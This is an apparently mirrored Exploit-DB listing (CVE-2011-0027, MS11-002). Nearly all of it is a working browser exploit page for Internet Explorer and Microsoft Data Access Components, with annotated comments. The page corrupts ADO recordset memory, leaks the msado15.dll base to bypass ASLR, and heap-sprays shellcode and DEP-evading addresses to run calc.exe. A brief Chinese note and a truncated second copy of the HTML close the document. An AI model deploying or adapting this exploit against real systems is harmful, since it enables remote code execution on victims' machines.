MS11-002: Microsoft Data Access Components Vulnerability(MS11-002:Microsoft 数据访问组件中的漏洞)
EDB-ID: 15984
CVE: 2011-0027
OSVDB-ID: N/A
Author: Peter Vreugdenhil
Published: 2011-01-12
Verified: √
Exploit Code: Vulnerable
App: N/A
From: http://www.exploit-db.com/exploits/15984/

Code:

<html xmlns:t = "urn:schemas-microsoft-com:time">

  <head> 

  <meta name="License" content="Q Public License;http://en.wikipedia.org/wiki/Q_Public_License"> 

    <style> 

      .body { 

        

      } 

      #test { 

      

      } 

    </style> 

    <script src="heapLib.js"></script> 

    <script> 

    // This code has been released under the Q Public License by Trolltech 

    // http://en.wikipedia.org/wiki/Q_Public_License 

    // Source: http://vreugdenhilresearch.nl/ms11-002-pwn2own-heap-overflow/ 

  

  

// Taken when the script is parsed; RunExploitTimer subtracts it from the end time to report the total run.
var StartTime = new Date();
// Number of heap.alloc() calls SprayHeap performs before it stops. SprayHeap compares against this;
// FaseTwo compares CurrentHeapSpraySize against the literal 900 instead of this name.
var FinalHeapSpraySize = 900;
//var SmallHoleSize = 0x1F0;
// Assigned to localxmlid1.CacheSize in FaseOne. The author's "small hole?" remark there and the
// earlier value kept above suggest the number was tuned by trial.
var SmallHoleSize = 0x240;
// Rows added and then deleted so far by IncreaseRowCounter; it stops scheduling itself at 0x10120.
var GlobalRowCounter = 0;
// ADO recordsets of the XML data islands xmlid1, xmlid2, xmlid3 and xmlid5 in the body; set in FaseOne.
var localxmlid1;
var localxmlid2;
var localxmlid3;
var localxmlid5;
// Base address derived in FindADOBase from two values it reads back (its alert text names msado15.dll).
// Stays 0 until that step succeeds; FaseTwo adds fixed offsets to it.
var adobase = 0;
// Spray block string built in FaseTwo; SprayHeap passes it to heap.alloc().
var finalspray = '';
// heapLib.ie instance created in FaseTwo. heapLib.js is loaded by a separate script tag and is not on this page.
var heap = null;
// Seconds shown by the RunExploitTimer countdown (one tick per 500 ms). The author's spelling of "ExploitTime".
var ExpoitTime = 10;
// Number of heap.alloc() calls made so far by SprayHeap.
var CurrentHeapSpraySize = 0;

  

  

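// Entry point, scheduled from the body's onLoad handler; it only starts phase one.
// The closing brace was lost in this copy of the listing and is restored here.
function Start() {
    FaseOne();
}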

  

  

  

function FaseOne() { 

  

  localxmlid1 = document.getElementById('xmlid1').recordset;     

  localxmlid2 = document.getElementById('xmlid2').recordset;     

  localxmlid3 = document.getElementById('xmlid3').recordset;     

  localxmlid5 = document.getElementById('xmlid5').recordset;     

    

  localxmlid2.CacheSize = 0x40000358; 

    

  localxmlid1.CacheSize = SmallHoleSize;;   //small hole? 

  localxmlid1.AddNew(["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"], ["c"]);  

  localxmlid5.AddNew(["BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"], ["c"]);  

    

    

  var my1field = localxmlid5.Fields.Item(0); 

  localxmlid1.MoveFirst(); 

    

  localxmlid2.AddNew(["BBBB"], ["c"]);   

    

  localxmlid1.Close(); 

  CollectGarbage(); 

    

  localxmlid3.MoveFirst(); 

    

  void(Math.atan2(0xbabe, ('###################### 2 Move First').toString())); 

  localxmlid2.MoveFirst(); 

  

  void(Math.atan2(0xbabe, ('###################### 5 Move First').toString())); 

  localxmlid5.CacheSize = 0x40000008; 

  localxmlid5.MoveFirst(); 

  localxmlid3.AddNew(["MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong"], ["cccccuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuFINDMEccccc"]);  

  

  var localxmlid4 = document.getElementById('xmlid4').recordset;     

  

  localxmlid4.AddNew(["bb"], ["c"]);  

  

  localxmlid4.MoveNext();   

    

    

  var localxmlid6 = document.getElementById('xmlid6').recordset;  

  localxmlid6.AddNew(["CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"], ["c"]);   

    

  localxmlid2.MoveFirst(); 

    

  Math.tan(1); 

    

  document.getElementById('textfaseone').innerText = 'Setting up data for ASLR evasion:'; 

  if(GlobalRowCounter < 0x10120) { 

    window.setTimeout(IncreaseRowCounter, 100); 

  } 

  

  

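// Phase one, second step: adds and deletes a "BBBB" row on the xmlid2 recordset 0x300 times per tick,
// updates the progress text and reschedules itself every 100 ms until GlobalRowCounter reaches
// 0x10120 (the counter overshoots by up to 0x2FF; only the `<` test matters). It then hands over to
// FindADOBase. Timer callback with no return value.
// Fixes in this copy: the closing brace that was lost in the listing is restored, and the loop index
// is declared with var instead of leaking as an implicit global.
function IncreaseRowCounter() {
    if(GlobalRowCounter < 0x10120) {
        for(var i = 0; i < 0x300; i++) {
            GlobalRowCounter++;
            localxmlid2.AddNew(["BBBB"], ["c"]);
            localxmlid2.Delete();
        }
        var percentcomplete = Math.round(GlobalRowCounter /0x10120 * 100);
        document.getElementById('progressfaseone').innerText = percentcomplete + "%";
        window.setTimeout(IncreaseRowCounter, 100);
    }
    else {
        document.getElementById('textfaseonedone').innerText = 'Now searching memory for suitable vtable. Please wait...';
        window.setTimeout(FindADOBase, 100);
    }
}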

  

function FindADOBase() { 

    //alert('FindADOBase'); 

    

      

  var myfield = localxmlid3.Fields.Item(1); 

  

    for(i = 0; i < 0xDF6; i++) { 

      localxmlid2.AddNew(["BBBB"], ["c"]);  

      localxmlid2.MoveFirst(); 

      if(myfield.Name != "MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong") { 

        break; 

      } 

    } 

    //alert('done first'); 

  

  void(Math.atan2(0xbabe, ('###################### Add untill vftable 2').toString())); 

    

  var vftable1 = null; 

  var vftable2 = null; 

    

    for(i = 0; i < 0xAE0; i++) { 

        void(Math.atan2(0xbabe, ('add row: ' + i).toString())); 

      localxmlid2.AddNew(["BBBB"], ["c"]);  

      localxmlid2.MoveFirst(); 

      //if(i > 10) { 

      //  document.forms[0].myresult.value += i.toString(16) + " : " + escape(myfield.name.substr((2 * i) + 4, 8)) + " : "  + myfield.name.length + "\n"; 

      //} 

      if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uAD68/)) { 

        vftable1 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\w\w\w\w)%u(\w\w\w\w)/, "$2$1"); 

      }       

      if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uD738/)) { 

        vftable2 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\w\w\w\w)%u(\w\w\w\w)/, "$2$1"); 

      }   

      if(vftable1  && vftable2) { 

        break; 

      } 

    } 

   //document.forms[0].myresult.value += "\n\nVFTABLES: " + vftable1 + " : " + vftable2 + "\n\n\n"; 

   //alert(vftable1); 

   if((parseInt(vftable1,16) - 0x1AD68) == (parseInt(vftable2,16) - 0xD738)) {        

     adobase = parseInt(vftable1,16) - 0x1AD68; 

     document.getElementById('textfoundaddress').innerText = 'Found base address of <censored>.dll: 0x<censored>';// + adobase.toString(16); 

     FaseTwo(); 

   } 

   else { 

     alert('sadly we failed to read the base address of msado15.dll :( ');   

   } 

     

}     

  

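// Phase two: builds the spray block and starts the timer-driven heap spray. Reads adobase (set by
// FindADOBase) to embed addresses through MakeAddressString, and needs the heapLib global from
// heapLib.js. Ends by scheduling SprayHeap, or calling RunExploit directly if the spray count is
// already at its bound. No return value.
// Changes in this copy: the closing brace lost in the listing is restored, the bound check uses
// FinalHeapSpraySize (same value as the literal 900 it replaces), and commented-out code is dropped.
function FaseTwo() {
  document.getElementById('textfasetwo').innerText = 'Setting up heap for DEP evasion:';
  document.getElementById('progressfasetwo').innerText = '0%';
  heap = new heapLib.ie(0x20000);

  // Fixed sequence of 16-bit words with some positions replaced by adobase-relative addresses.
  // Word order and offsets are the author's layout; do not reorder or reformat the pieces.
  // The author's removed notes identified the "%u6163..." segment as the strings "calc.exe" and
  // "\system32\calc.exe" (the notes also listed a full c:\windows\system32\calc.exe variant).
  var heapspray = unescape("%u2020%u1604%u0102%u0103%u0104%u0105" + MakeAddressString(adobase + 0x117C3) + MakeAddressString(adobase + 0x1188 - 0x1C) + "%u010A%u010B" + MakeAddressString(adobase + 0x4270B) + "%u010E%u010F%u0110%u0111%u0112%u0113" + "%u2100%u1604" + "%u0116%u0117%u0118%u0119%u011A%u011B%u011C%u011D%u011E%u011F%u0120%u0121%u0122%u0123" + MakeAddressString(adobase) + "%u0126%u0127%u0128%u0129%u012A%u012B" + "%u2024%u1604" + "%u012E%u012F%u0130%u0131%u0132%u0133" + "%u0040%u0000" + "%u0136%u0137" + MakeAddressString(adobase + 0x1B1F0) + "%u013A%u013B" + "%u0200%u0000" + "%u013E%u013F" + "%u2030%u1604" + "%u0142%u0143%u0144%u0145%u0146%u0147%u0148%u0149%u014A%u014B%u014C%u014D%u014E%u014F%u0150%u0151%u0152%u0153%u0154%u0155%u0156%u0157%u0158%u0159%u015A%u015B%u015C%u015D%u015E%u015F%u0160%u0161%u0162%u0163%u0164%u0165%u0166%u0167%u0168%u0169%u016A%u016B%u016C%u016D%u016E%u016F" +
                  "%u9090%u9090%u868B%u1108%u0000%u5056%u056A%uA068%u0421%u0516%u185E%u0008%uD0FF%u5058%u0590%u0BBB%u0000%uD0FF%uF88B%u0558%u3B47%u0000%u006A%uFF57%uCCD0" + "%u0189%u018A%u018B%u018C%u018D%u018E%u018F%u0190%u0191%u0192%u0193%u0194%u0195%u0196%u0197%u0198%u0199%u019A%u019B%u019C%u019D%u019E%u019F%u01A0%u01A1%u01A2%u01A3%u01A4%u01A5%u01A6%u01A7%u01A8%u01A9%u01AA%u01AB%u01AC%u01AD%u01AE%u01AF%u01B0%u01B1%u01B2%u01B3%u01B4%u01B5%u01B6%u01B7%u01B8%u01B9%u01BA%u01BB%u01BC%u01BD%u01BE%u01BF" +
                  "%u6163%u636C%u652E%u6578%u0000%u735C%u7379%u6574%u336D%u5C32%u6163%u636C%u652E%u6578%u0000%u0000" + "%u01D0%u01D1%u01D2%u01D3%u01D4%u01D5%u01D6%u01D7%u01D8%u01D9%u01DA%u01DB%u01DC%u01DD%u01DE%u01DF%u01E0%u01E1%u01E2%u01E3%u01E4%u01E5%u01E6%u01E7%u01E8%u01E9%u01EA%u01EB%u01EC%u01ED%u01EE%u01EF" + "%u20A0%u1604" + "%u01F2%u01F3%u01F4%u01F5%u01F6%u01F7%u01F8%u01F9%u01FA%u01FB%u01FC%u01FD%u01FE%u01FF%u0200%u0201%u0202%u0203%u0204%u0205%u0206%u0207%u0208%u0209%u020A%u020B%u020C%u020D%u020E%u020F%u0210%u0211%u0212%u0213%u0214%u0215%u0216%u0217%u0218%u0219%u021A%u021B%u021C%u021D%u021E%u021F%u0220%u0221%u0222%u0223%u0224%u0225%u0226%u0227%u0228%u0229%u022A%u022B%u022C%u022D%u022E%u022F%u0230%u0231%u0232%u0233%u0234%u0235%u0236%u0237%u0238%u0239%u023A%u023B%u023C%u023D%u023E%u023F%u0240%u0241%u0242%u0243%u0244%u0245%u0246%u0247%u0248%u0249%u024A%u024B%u024C%u024D%u024E%u024F%u0250%u0251%u0252%u0253%u0254%u0255%u0256%u0257%u0258%u0259%u025A%u025B%u025C%u025D%u025E%u025F%u0260%u0261%u0262%u0263%u0264%u0265%u0266%u0267%u0268%u0269%u026A%u026B%u026C%u026D%u026E%u026F%u0270%u0271%u0272%u0273%u0274%u0275%u0276%u0277%u0278%u0279%u027A%u027B%u027C%u027D%u027E%u027F%u0280%u0281%u0282%u0283%u0284%u0285%u0286%u0287%u0288%u0289%u028A%u028B%u028C%u028D%u028E%u028F%u0290%u0291%u0292%u0293%u0294%u0295%u0296%u0297%u0298%u0299%u029A%u029B%u029C%u029D%u029E%u029F%u02A0%u02A1%u02A2%u02A3%u02A4%u02A5%u02A6%u02A7%u02A8%u02A9%u02AA%u02AB%u02AC%u02AD%u02AE%u02AF%u02B0%u02B1%u02B2%u02B3%u02B4%u02B5%u02B6%u02B7%u02B8%u02B9%u02BA%u02BB%u02BC%u02BD%u02BE%u02BF%u02C0%u02C1%u02C2%u02C3%u02C4%u02C5%u02C6%u02C7%u02C8%u02C9%u02CA%u02CB%u02CC%u02CD%u02CE%u02CF%u02D0%u02D1%u02D2%u02D3%u02D4%u02D5%u02D6%u02D7%u02D8%u02D9%u02DA%u02DB%u02DC%u02DD%u02DE%u02DF%u02E0%u02E1%u02E2%u02E3%u02E4%u02E5%u02E6%u02E7%u02E8%u02E9%u02EA%u02EB%u02EC%u02ED%u02EE%u02EF%u02F0%u02F1%u02F2%u02F3%u02F4%u02F5%u02F6%u02F7%u02F8%u02F9%u02FA%u02FB%u02FC%u02FD%u02FE%u02FF");

  // Pad to 0x200 characters, double until at least 0x40000, then trim the edges as the author did.
  while(heapspray.length < 0x200) heapspray += unescape("%u4444");

  var heapblock = heapspray;
  while(heapblock.length < 0x40000) heapblock += heapblock;
  finalspray = heapblock.substring(2, 0x40000 - 0x21);

  // Same bound SprayHeap checks; the listing compared against the literal 900 here.
  if(CurrentHeapSpraySize < FinalHeapSpraySize) {
    window.setTimeout(SprayHeap, 100);
  }
  else {
    RunExploit();
  }
}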

  

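// Phase two, second step: calls heap.alloc(finalspray) 90 times per tick every 100 ms, updating the
// progress text, until CurrentHeapSpraySize reaches FinalHeapSpraySize - 1; then starts the
// RunExploitTimer countdown. Timer callback with no return value.
// The closing brace lost in this copy of the listing is restored.
function SprayHeap() {
  if(CurrentHeapSpraySize < FinalHeapSpraySize - 1) {
    for(var i = 0; i < 90; i++) {
      heap.alloc(finalspray);
      CurrentHeapSpraySize++;
    }
    var percentcomplete = Math.round(CurrentHeapSpraySize /FinalHeapSpraySize * 100);
    document.getElementById('progressfasetwo').innerText = percentcomplete + "%";
    window.setTimeout(SprayHeap, 100);
  }
  else {
    document.getElementById('textfasetwodone').innerText = "Ready to start calc.exe in: ";
    window.setTimeout(RunExploitTimer, 100);
  }
}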

      

  

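// Countdown before the final step: shows ExpoitTime and decrements it every 500 ms; at zero it
// prints the elapsed seconds since StartTime and schedules RunExploit. Timer callback, no return value.
// The closing brace lost in this copy of the listing is restored.
function RunExploitTimer() {
  if(ExpoitTime > 0) {
    document.getElementById('countexploitrun').innerText = ExpoitTime;
    window.setTimeout(RunExploitTimer, 500);
    ExpoitTime--;
  }
  else {
    document.getElementById('countexploitrun').innerText = 0;
    var EndTime = new Date();
    var TotalRun = Math.round((EndTime.getTime() - StartTime.getTime()) / 1000);
    document.getElementById('totalruntime').innerText = "Total exploitation time: " + TotalRun + " seconds";
    window.setTimeout(RunExploit, 100);
  }
}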

      

// Final step. Creates 100 div elements, takes the first style sheet's owningElement and imports,
// appends and removes that element on the document, replaces it via outerHTML, forces a collection,
// writes the same className string into every div, and finally calls insertAdjacentElement on the
// replaced element. The statement order is the substance of this function: do not reorder or drop
// the calls that look redundant. No return value.
// owningObj, myimports, Result and the loop index i are assigned without var and become globals;
// left unchanged here because the reference lifetimes around CollectGarbage() may depend on it.
function RunExploit() {
  var elms = new Array();
  for(i =0; i < 100; i++) {
      elms.push(document.createElement('div'));
  }

  owningObj = document.styleSheets[0].owningElement;
  myimports = document.styleSheets[0].imports;

  document.appendChild(owningObj);
  document.removeChild(owningObj);

  owningObj.outerHTML = 'a';

  // Math.atan2(0xbabe, ...) has no effect on the page; given the constant and the labels it is
  // presumably a tracing marker for an attached debugger (an inference, not shown in this file).
  Math.atan2(0xbabe, "Collect");
  CollectGarbage();

  Math.atan2(0xbabe, "spray");
  for(i = 0; i < 100; i++) {
    elms[i].className = unescape("%u4140%u4141%u4142%u4143%u4144%u4145%u4146%u4147%u4148%u4149%u414a%u414b%u414c%u414d%u414e%u414f%u4151%u4152%u4153%u4154%u2020%u1604%u2020%u1604%u4159%u415a%u415b");
  }

  Result = owningObj.insertAdjacentElement(myimports,'a');
}

  

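// Converts a 32-bit address to the "%uLLLL%uHHHH" escape form: the hex string is split into two
// 16-bit halves and swapped, so that unescape() yields two UTF-16 code units whose in-memory bytes
// are the address in little-endian order.
// Only values that print as exactly eight hex digits are transformed. Shorter values (below
// 0x10000000) come back as plain hex and longer ones only have their first eight digits swapped;
// the callers in FaseTwo pass adobase-relative values, which the author evidently expects to be
// eight digits. Returns a string.
// The closing brace lost in this copy of the listing is restored.
function MakeAddressString(addrint) {
    //First, turn into hex:
    var addstr = addrint.toString(16);
    //Split and swap
    addstr = addstr.replace(/(\w\w\w\w)(\w\w\w\w)/,"%u$2%u$1");
    return addstr;
}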

      

    </script> 

  

  </head> 

  <body onLoad="window.setTimeout(Start,100);" id="bodyid"> 

  <div> 

    <h2 id="textfaseone"></h2> 

    <br> 

    <h2 id="progressfaseone"></h2> 

    <br> 

    <h2 id="textfaseonedone"></h2> 

    <br> 

    <h2 id="textfoundaddress"></h2> 

    <br> 

    <h2 id="textfasetwo"></h2> 

    <br> 

    <h2 id="progressfasetwo"></h2> 

    <br> 

    <h2 id="textfasetwodone"></h2> 

    <br> 

    <h2 id="countexploitrun"></h2> 

    <br> 

    <h2 id="totalruntime"></h2> 

  </div> 

  

<?xml version="1.0" encoding="utf-8" standalone="yes"?> 

<XML ID="xmlid1"> 

<Devices> 

<Device> 

<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /> 

</Device> 

</Devices> 

</XML> 

  

<?xml version="1.0" encoding="utf-8" standalone="yes"?> 

<XML ID="xmlid2"> 

<Devices> 

<Device> 

<BBBB /> 

</Device> 

</Devices> 

</XML> 

  

<?xml version="1.0" encoding="utf-8" standalone="yes"?> 

<XML ID="xmlid3"> 

<root> 

<data> 

    <SmallData> 

  </SmallData> 

<MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong> 

    value1 

</MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong> 

</data> 

</root> 

</XML> 

  

<?xml version="1.0" encoding="utf-8" standalone="yes"?> 

<XML ID="xmlid4"> 

<Devices> 

<Device> 

<bb /> 

</Device> 

</Devices> 

</XML> 

  

<?xml version="1.0" encoding="utf-8" standalone="yes"?> 

<XML ID="xmlid5"> 

<Devices> 

<Device> 

<BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB /> 

</Device> 

</Devices> 

</XML> 

  

<?xml version="1.0" encoding="utf-8" standalone="yes"?> 

<XML ID="xmlid6"> 

<root> 

<data> 

<CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC> 

    value2 

</CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC> 

</data> 

</root> 

</XML> 

  

  </body> 

</html>

----------------------------------------------------------------------------------------------

一共2个文件:一个HTML,一个JS。

Exp.Html:

<html xmlns:t = "urn:schemas-microsoft-com:time">
  <head>
  <meta name="License" content="Q Public License;http://en.wikipedia.org/wiki/Q_Public_License">
    <style>
      .body {
     
      }
      #test {
   
      }
    </style>
    <script src="heapLib.js"></script>
    <script>
    // This code has been released under the Q Public License by Trolltech
    // http://en.wikipedia.org/wiki/Q_Public_License

// Taken when the script is parsed; RunExploitTimer subtracts it from the end time to report the total run.
